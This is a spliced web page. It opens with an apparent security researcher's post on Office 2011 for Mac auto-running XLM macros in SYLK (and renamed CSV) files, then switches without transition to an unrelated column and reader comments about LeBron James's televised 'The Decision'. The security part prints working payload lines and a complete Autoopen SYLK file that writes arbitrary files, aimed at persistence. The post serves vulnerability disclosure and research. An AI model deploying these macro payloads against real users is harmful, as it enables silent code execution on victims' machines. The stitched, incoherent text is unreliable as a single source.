October 12, 2018 At our Derbycon talk, the, Stan and myself presented various novel techniques for abusing Excel and Word in Red Teaming operations. One of the tricks introduced was about the Sylk fileformat.

Full detailled blogs on Sylk and other discussed subjects will follow later. For now it suffices to say that we shared a that pops Calc using XLM when the victim enables macro. As Sylk files are text files they do not open in protected mode. TL;DR In Office 2011 for Mac XLM Macro’s in Sylk files are auto executed (no protected mode or macro prompt). Time to say goodbye and really remove office 2011.

Issue may even be triggered if you have both Office 2016 and 2011 for Mac installed. Background After our talk, I directly took a plane back home. When I arrived back in Amsterdam I took a train home. During my trainride, I decided to play around further and weaponize Sylk using DCOM for lateral movement.

I was tired from the flight, and somewhere in that process I managed to open the example Sylk file on Office in MacOS instead of Windows. I got the following warning: Hey, that’s strange. I did not yet enable macro’s but already some part of the macro got interpreted? Further looking into it, I noticed that the Sylk was opened with Excel 2011, instead of Excel 2016 which I also had installed. This needed some closer inspection. But my train almost arrived, I barely had time to update the EEXEC from the demo sample to EALERT and without any macro warnings got the following alert: So, Sylk XLM bypassed all macro security alerts in Office 2011 on Mac! Furthermore, on my Mac SLK is by default bound to Office 2011 instead of Office 2016.

Train arrived, went home and started working on weaponization. Weaponization Based on the XLM documentation, Stan and I started working on weaponization. Unfortunately, simple examples that worked for Office for Mac 2016 did not work on Office 2011. We tried various failing approaches: C;X1;Y101;K0;ECALL('libc.dylib','system','JC','open -a Calculator') The EXEC command somehow provided different error messages when I provided an.exe extension, so tried with a bash script test.sh as well as test.exe. C;X1;Y101;K0;EEXEC('test.sh') As various code execution approaches failed, and I was jet-lagged I decided to sleep over it.

Next day I decided to go in another direction. Show that I was capable of writing a file with arbitrary contents to an arbitrary location and use this to write in a persistence location.

For that I needed to study the XLM and Sylk spec a bit deeper and ended up with the following 400 bytes. ID;P O;E NN;NAutoopen;ER1C1;KOutFlank;F C;Y1;X1;N;EDIRECTORY C;X1;Y2;K0;ESELECT(R1C1) C;X1;Y2;N;K13;EFIND(':';;R1C1) C;X1;Y3;N;K19;EFIND(':';;R1C1;;R2C1+1) C;X1;Y4;N;K27;EFIND(':';;R1C1;;R3C1+1) C;X1;Y5;N;ELEFT(R1C1;;R4C1 -1) C;X1;Y6;N;KFALSE;EDIRECTORY(R-1C) C;X1;Y7;N;K0;EFOPEN('MALICIOUS.FILE';;3) C;X1;Y9;K0;EFWRITE(R7C1;;'PWNED BY OUTFLANK') C;X1;Y10;K0;EFCLOSE(R7C1) C;X1;Y11;K0;EHALT E Line 1 is just a standard header, line 2 indicates a Global Option, this sheet is a Macro (Executable) sheet.

Line 3 indicates the name of the macro; when naming it Autoopen it starts on open. Then we move into the real XLM macro.

The DIRECTORY command provides us with the current dir separated with a colon (:), we parse the first 3 colons from the string and then use the DIRECTORY command again to go into that dir (typical /macintoshHD/users/$username). Then we open a file ‘MALICIOUS.FILE’ and write our output there. The E record indicates the End of file. I guess anybody can adapt this to a user-space persistence method. Time to report to Microsoft Reporting to Microsoft 9-10-2018: Issue reported: Reaction Microsoft: The product team has taken a look at this submission and has informed me that Excel for Mac 2011 is not supported any more, and thus is not eligible for security updates.

Mac Excel 2016 and 2019 prompt with “Enable Macro” alerts correctly. For further discussions, questions and more, you can reach us on Twitter and We’ll have blog live soon on the exact Sylk spec and our various attack examples etc. Instead of finishing our blogs we decided pwning Office 2011 on MacOS was way cooler 😉 Update Just noticed that a rename to CSV also works. A CSV that can execute code and write to arbitrary disk locations. Who could’ve imagined that.

I went to sleep last night not sure if I should write anything about “The Decision,” the bizarre, excruciating one-hour special that ESPN carried last night so LeBron James could announce that he was leaving the Cleveland Cavaliers to sign with the Miami Heat. This isn’t a sports blog (though I did, on rare occasions, write about the Yankees and Giants at ) and actual sportswriters like and have already offered up more thoughtful takes than anything I’ve got. Plus, as a Knicks fan, I worried that I’d just come across as someone bitter about being jilted. But this is a TV story, in the end, as LeBron was involved in one of the lamest, most obnoxious hours I’ve ever had to witness (and remember, I watch “American Idol” weekly). And while I’m disappointed (and have already moved on to hoping the David Lee/Anthony Randolph trade turns out to be the opposite of all the moves Isiah Thomas made during his nightmarish tenure), I had reached a place by Wednesday afternoon (i.e., before the Miami reports came in and it looked like LeBron was either staying home or coming to New York) where I began to wonder if I wanted this guy on my team.

Okay, let’s be real: I really, really wanted him. He’s the most talented player on the planet, the entire Knicks roster was constructed as a bunch of complementary pieces to the King (and desperately needs a point guard without him), etc., etc., etc.

But he had come across so badly in the way he handled free agency – not helped by a sports news media(.) that treated every rumor as gospel, setting the concept of the reliable source back several decades and making LeBron look even more indecisive than he was – that I would have felt like my team and its fans were making a deal with the devil by this point. I’d have taken him, obviously, but not with nearly the enthusiasm as I would have before this process began. (.) One of the few exceptions to this was Alan Hahn, the outstanding Knicks beat writer for New York Newsday, who stayed out of the fray and didn’t report every stray piece of gossip he had heard as if it was wisdom from the mountaintop. So when that LeBron had chosen Miami, I felt confident it was true. The work of Hahn and a handful of other reporters (like Brian Windhorst from the Cleveland Plain Dealer, who knew LeBron since high school and put out earlier in the week) on this story was in stark contrast to the likes of ESPN’s Chris Broussard, who changed LeBron’s destination every five seconds, and who, after also ultimately staking his claim to Miami as the pick, looked miserable and terrified at the start of “The Decision,” knowing that if LeBron’s people had been playing him, he’d look like even more of a clown than he had over the previous week.

Just a bad period all around for the media. For a guy who’s obsessed with his “brand,” it’s staggering how badly he bungled things from a PR standpoint.

Going to Miami for a team that would feature two of the NBA’s top 3 players, plus a guy easily in the top 15, makes an incredible amount of sense. Yes, there’s risk that his game might not mesh with Dwyane Wade and Chris Bosh, and that Pat Riley might not be able to surround them with enough quality role players, but from a basketball standpoint, it’s still a better situation than Cleveland (capped-out and filled with mediocre guys made to look better by James), Chicago (lots of talent, but no shooters that he needs, plus he and Derrick Rose seem incompatible), New York (lots of shooters plus Amar’e, but little depth and defense if he signed), etc. It makes sense from a basketball standpoint, and from a narrative standpoint.

LeBron played with Wade and Bosh at the Olympics. They hit it off famously, allegedly discussed joining together when all were free agents, etc.

If LeBron wanted the story to be “Miami gives me by far the best chance to win, and as a bonus I get to play with my friends, and I will take less money for those things than I would have in Cleveland or elsewhere” he needed to make the announcement at the same time as Wade and Bosh, and he needed to do it in a much lower-key way, like a simple press conference. That way he looks decisive (as opposed to waiting for them to make their choice), doesn’t look like an attention hog, doesn’t create the largest possible audience in which he could tell New York, Chicago, New Jersey and, especially, Cleveland, to drop dead. If he wanted to raise money or awareness for Boys and Girls Clubs, he could have easily done that in a lot of other ways, including announcing at said press conference that he was going to write them a large check from his new Miami contract. Not only did the timing and the idea of doing a solo primetime show come off badly, but the execution by both LeBron and ESPN was horrid.

I understand why ESPN would agree to this – ratings were huge – but both the athlete and the channel came out looking terrible. I wrote a joking on Wednesday about the idea that LeBron and ESPN might need to copy some reality show results show tropes to fill the time, and most of those suggestions would have been denser and more entertaining than what ESPN and LeBron ultimately chose to do. One of the most tone-deaf interviewers in the history of televised sports? A man who never seems to make a human connection with either his subject or audience? This is who you want asking the first questions about LeBron leaving his home state heartbroken so he can go play for an all-star team? And LeBron comes into this without any kind of clear talking points about the appeal of Miami (besides the chance to win) or his regrets about leaving Cleveland?

Did no one prepare him in any way? Did he have no idea how stiff and robotic and cruel he came across as throughout that special? Look, LeBron was always going to be criticized in some corners for this move by people who suggested (as Knicks Hall of Fame guard Walt Frazier did) he was taking the easy way out by linking up with Wade, who had already won a title. And Cleveland was always going to be miserable no matter how LeBron pulled this off. The team will slide back into mediocrity, if not ’00s Knicks-level badness, and the area will lose a lot of money that came from 41 sold-out games a season.

But the way it actually went down, it’s not hard to understand why Cavs fans were burning his jersey in the street, or why Cavs owner Dan Gilbert went to Defcon-1 and issued an amazing, juvenile, incendiary to the team’s fans that, among other things, promised, in all-caps (and Comic Sans!): “I PERSONALLY GUARANTEE THAT THE CLEVELAND CAVALIERS WIN AN NBA CHAMPIONSHIP BEFORE THE SELF-TITLED FORMER ‘KING’ WINS ONE.” It’s not hard to understand how LeBron went from one of the most-liked players in the league to someone whose polling turned unfavorable seemingly overnight. As a TV show, “The Decision” was both nasty and boring (a tough combination to pull off). As an attempt to build the brand of LeBron James, it was a catastrophe. The pressure on this trio to win multiple championships will be huge and unforgiving: if they win, it’s because they were expected to, and if they lose, it’s embarrassing. And the biggest target will be on the back of the man who sat stone-faced in Greenwich, CT last night.

Alan Sepinwall may be reached at. According to Gray himself, who appeared on the Dan Patrick radio show yesterday, it was his idea from the start. He claimed to have approached Maverick Carter, LeBron’s “manager,” at the NBA Finals in LA and proposed packaging an interview together and selling it to ESPN.

He also said Ari Emmanuel was there (of course) and thought it was a great idea. Gray’s freelance, though after that sham last night, he should never be permitted to refer to himdelf as a “journalist” again. To me, the interesting thing was what terrible TV it was. I wasn’t surprised how poorly LeBron handled it all, or how tone deaf it was to Cleveland fans (a group to which I belong, and as such have been conditioned to expect such treatment).

But the 15 minute lead-in, the fake jerseys, the Stu Scott bloviating, Chris Broussard sweating like a fool, etc. Then the interview started and for 6 MINUTES Gray wasted more time, even asking one question twice! I feel like I could talk about all of this for hours, but at the same time it left me so sick that I never want to think of it again.

The world we live in is what created this whole mess, in my opinion. Celebrity obsession, 24/7 news days, and social networking all contributed to this mess, LeBron gets some blame, but I don’t hate the guy over this. He’s a product of his generation and the environment that generation grew up in. I don’t care for how he handled this, but I don’t hold it against him, and it doesn’t make me think any less of him as a person. My only question is, where was the person to tell him “don’t do the TV special”. People forget that he is still only 25 years old.

Hell, I’m 24 and I can’t imagine making a choice like that. I thought it was weird how Lebron talked about his “team” sitting down across from the other “team” to see if he wanted to be a part of their “team.” Showed where his head was really at. Also, not that championships won at Miami will be tarnished in any way, but say he wins 3 or 4 or 8.

You won’t say “Lebron won 8 championships in Miami,” the way you say “Jordan won 6 in Chicago.” I guess he doesn’t care about them being HIS. He is no longer the King. Maybe the Grand Vizier? Shoulda come to NY. Double yes (coming from a Mets fan).

And, as a Bulls fan, I’m now kind of glad James didn’t come to Chicago. Better that he remains a rival than booed for the home team.

I didn’t watch the show (seeing as what news was coming out of the special would be reported everywhere), and you’ve done a great job of painting a picture of something I’m glad I missed. In fact, I was watching season 3 of The Wire to follow along with the summer columns here while the show was progressing, and I feel confident that I made the right choice. Still, great article, Alan! To me there are 2 separate and distinct parts to this whole situation. First, the show itself which was indeed a bad idea all the way around (compounded by ESPNs horrible execution of said idea).

Flipboard: Sylk Xlm Code Execution On Office 2011 For Mac Torrent

While LBJ is ultimately responsible for going through with the show I think his management and PR folks have a lot of culpability here. He’s still a young guy and if his people said it would be good for him to do it, how would he know any better? He’s an athlete not a scholar. The second issue that everyone really seems to be up in arms over is this supposed “betrayal” of Cleveland. I don’t get that part AT ALL. He’s an athlete who gave his all to the team for seven years. He didn’t and doesn’t owe Cleveland a damn thing.

Cavs management had seven years to give him enough quality teammates/coaches to win a championship and failed utterly at every opportunity. If I was a Cavs fan I’d be more upset at ownership for mismanaging the cap and mismanaging their talent acquisition so badly that Lebron felt his best opportunity to win was to leave. Yo, the betrayal thing goes like this.we all knew he could and likely would leave. We never, ever, ever, ever, etc. Thought he would do it on national tv without so much as a personal phone call to say goodbye to the team that gave him his start in the NBA.

We were betrayed because it was disrespectful. It was unclassy, rude and pretentious, something many of us in the area have been convincing ourselves LeBron was not. We were wrong.

Go ahead and leave our team-you were still born and raised here and did give us 7 great years of wonderful basketball. But don’t treat your first team the way you just did-your hometown just may not forgive you for spitting in its face on your way to bigger and better things. He does owe them common decency, for all the support and for helping to pay millions of dollars a year for him to play basketball. He also owes the common decency of telling his teammates and coworkers and Cleveland fans that he is leaving, and why. He didn’t do that, and the reason he didn’t do that was to make that stupid reality tv abortion on ESPN have more drama.

Let that sink in. The fans who loved him for years, attended his games, and his teammates who worked with him every day for years – he didn’t respect these people enough to tell them any sooner than he told the rest of the world on live TV special, and he didn’t tell them to increase dramatic effect. That is awful. Add to that there was no real dramatic effect, 48 states in the country predicted he was gone to Miami, if that even makes a difference. Cavs management didn’t give him quality teammates?

They led the league in wins the past two years! Who failed this past May? Pretty sure you should rewatch games 4, 5 and 6 of the Boston series. No one failed worse than Lebron.

1.) Everyone recognizes that he was a free agent and therefore completely within his rights to sign with anyone he wanted. However, he was supposed to be a guy who understood the plight of the Cleveland sports fan and how much The Drive, the Fumble, the Shot, and Jose Mesa destroyed that city.

At the very least, if he left, he owed them a little common decency, i.e., not dragging them out into public and humiliating them on national television. 2.) As for having a better chance to win titles in Miami: a. Why exactly does he have a better chance to win now than with the Cavs, who have had the best record in the NBA each of the past two seasons and were picked by most pundits to win the title this year; b.

If winning is so important that he (and Wade and Bosh) is willing to take less money to join forces, then why didn’t he ever take less money in Cleveland so that they could lure any marquee free agents the past seven years?; and c. Cavs management gave LeBron whatever he wanted, as alluded to in Dan Gilbert’s (admittedly insane and counter-productive) letter. He couldn’t get the job done, and now the “King” wants to be Robin to Wade’s Batman. Have fun becoming a “global icon” now. Alan, I’m a big fan. I just finished re-watching season 3 of the Wire and have been reading your season 3 recaps. I’m also a huge sports fan and have been following the LeBron decision.

In your last Wire review, you wrote how Marlo is strictly a product of “the game” and how this has made him much more one deminisional in his focus comparted to Avon and Stringer. He doesn’t care about/understand the outside world. I think there is a comparison to be made with LeBron. He’s grown up post Jordan, post ESPN and ESPN2. His whole career has been during the internet era. All he’s known is athletes being beloved, not because of what team they play for, but because of the brand name they have created for themselves. I don’t think he could conceive people not loving him no matter what decision he made because he sees himself as a Jordan-like icon that is supposed to be loved.

Much the same way Marlo couldn’t imagine anything more important than power and street cred because that’ all he knows to strive for. I went to sleep last night not sure if I should write anything about “The Decision,” the bizarre, excruciating one-hour special that ESPN carried last night so LeBron James could announce that he was leaving the Cleveland Cavaliers to sign with the Miami Heat.

Dude – you should have stayed asleep. If the negative opinions of James and his EGO were currency – we could pay off the National Debt. He wanted his own reality show and he got it and now he will pay for it but not with my money. NBA – I am OUT!